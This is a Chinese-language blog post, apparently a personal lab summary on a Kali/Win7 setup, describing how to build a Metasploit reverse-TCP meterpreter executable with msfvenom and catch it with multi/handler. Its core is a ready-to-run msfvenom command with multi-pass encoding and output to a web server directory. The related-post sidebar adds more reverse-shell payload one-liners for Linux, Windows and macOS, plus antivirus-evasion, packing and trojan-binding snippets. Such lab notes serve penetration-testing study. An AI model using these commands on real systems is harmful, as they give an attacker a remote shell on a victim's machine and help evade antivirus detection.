关于msfconsole生成攻击载荷(自我小结)

于 2024-02-16 23:09:06 发布
阅读量416 收藏 8
点赞数 9
文章标签: vim 安全 神经网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65106563/article/details/136129471
版权

实验工具:kali,win7靶机

一:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=本机 lport=4444 -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/demo2.exe

关于上图msfvenom的指令

 -a: 指系统的架构

-p:指攻击载荷

-e:指编码器

-i:指编码次数

-f:指输出文件格式

-o:指输出路径

二:进入监听模块

(1)输入msfconsole进入msf

(2)使用监听模块(use exploit/multi/handler)

(3)设置payload(set payload windows/meterpreter/reverse_tcp)

(4)设置lhost和lport

(5)run

三:win7靶机点击生成的demo2.exe

最后kali进入meterpreter

ke304
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
msfconsole
12-12
kail、ubantu的msfconsole平台的用法,如search导入,use调用等等
MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
05-24 7599
【渗透工具】MSFconsole进阶:Payload(攻击载荷模块)
MSF攻击载荷生成
yanyi3271的博客
10-30 1592
1、查看该模块的可用参数 msfvenom -p windows/shell_reverse_tcp --list-options 2、生成攻击载荷 msfvenom -p windows/shell_reverse_tcp LHOST=10.180.7.20 LPORT=31337 -f exe -o payload1.exe 其中: -f 表示输出格式 -o 表示保存payload为一个...
msf相关讲解
weixin_46476861的博客
01-22 1万+
Metasploit就是一个安全漏洞检测工具。它的全称叫做The Metasploit Framework,简称MSFmsf专业术语: 1 渗透攻击(Exploit) 攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。 2 攻击载荷(Payload) 目标系统在被渗透攻击后而执行的代码。在MSF框架中可以自由的选择、传送和植入。 3 溢出代码(Shellcode) 渗透攻击时作为攻击载荷运行的一组机器指令。shellcode通常用汇编语言编写。 4 模块(Module) 在MSF
msf生成攻击载荷进行免杀处理
Solar's Blog
04-30 3694
使用MSF编码器避免被查杀的最佳方法之一就是使用MSF编码器(集成入msfvenom功能程序)对我们要生成攻击载荷文件进行重新编码。MSF编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状,让杀毒软件认不出它原来的样子,而程序功能不会受到任何影响。和电子邮件附件使用Base64重新编码类似,MSF编码器将原始的可执行程序进行编码,并生成一个新的二进制文件。当这个文件运行后,MSF编码器...
使用Metasploit生成攻击载荷——msfvenom免杀、upx加壳
渗透测试
06-06 7295
文章目录前言一、免杀1.msfvenom的使用2.多重编码二、加壳1.upx的使用总结 前言 本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件 一、免杀 免杀字面意思就是避免被杀掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被杀毒软件干掉,使用相关技术让载荷躲过杀毒软件的扫描 1.msfvenom的使用 ┌──(root????kali)-[~] └─# msfvenom info
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
最新发布
05-10
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
MSFconsole可以辅助完成这些步骤,例如使用nmap模块进行端口扫描,利用exploits进行攻击,通过payloads在目标系统上建立持久化通道。 4. **Windows兼容性**:虽然Metasploit通常与Linux环境关联,但其Windows版本...
MSFconsole.pdf
07-09
MSFconsole
msfconsole讲解.pptx
09-27
hack -msf 木马生成精讲,PPT MSF全称msfconsoleMsfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。 MSF有免费和收费两种版本...
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 3343
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
msfvenom
weixin_59114667的博客
03-02 141
木马程序格式:jpg exe txt
msfvenom参数总结
Fng的博客
09-19 1122
kali中的msfvenom取代了msfpayload和msfencode,常用于生成木马。
MSF生成各类攻击载荷
小丁长不胖
07-21 513
Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf Windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe Mac: msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.m
msf攻击载荷生成
我还在的博客
10-06 1649
msf攻击载荷生成器0x00 前言0x01 拓扑结构0x02 过程1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成生成木马过程 0x00 前言 这是我对 msf攻击载荷生成器的学习记录。 0x01 拓扑结构 0x02 过程 1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成生成木马过程 1.1 显示msfpayload命令的使用方法:msfp...
Kali linux 2016.2(Rolling)中metasploit的端口扫描
weixin_30315723的博客
05-17 211
  目前常见的端口扫描技术一般有如下几类: TCP Connect、TCP SYN、TCP ACK、TCP FIN。 Metasploit中的端口扫描器   Metasploit的辅助模块中提供了几款实用的端口扫描器。可以输入search portscan命令找到相关的端口扫描器。如下 root@kali:~# msfconsole ...
meterpreter的攻击载荷使用
草色烟光
01-17 2825
meterpreter号称是metasploit里面最牛逼的模块,今天我就使用了一下,下面记录一下过程。我这次试验的主要目的是,把能用的攻击载荷绑定到Putty程序上,当受攻击者打开Putty程序之后,我再通过命令将木马线程迁移到一个不会关闭的进程上,如explorer.exe.然后我就能保证木马进程持续不衰地为我服务了,至于怎么诱导人打开,还有怎么使用这个进程,这是后话,还需要进行后面命令的处理
Metasploit 学习笔记
热门推荐
不急不躁
07-11 2万+
在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和Metasploit服务 然后就可以完整的利用 msf 数据库查询 exploit 和记录service postgresql start service metasploit start如果不想每次开机都这样,还可以配置随系统启动update-rc.d postgresql enable update-rc.d me
metasploit渗透学习日记一
G46SEC
01-11 5163
PTES(渗透测试)标准中的渗透测试阶段 PTES标准中的渗透测试阶段是用来定义渗透测试过程,并确保客户组织能够以一种标准化的方式来扩展一次渗透测试。 1、情报收集 社交媒体网络 Google Hacking技术 目标系统踩点 最为重要的一项技术是对目标系统的探查能力,包括获知它的行为模式、运行机理,以及最终可以如何被攻击。 2、威胁建模阶段 威胁建模主要使用你在情报搜
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值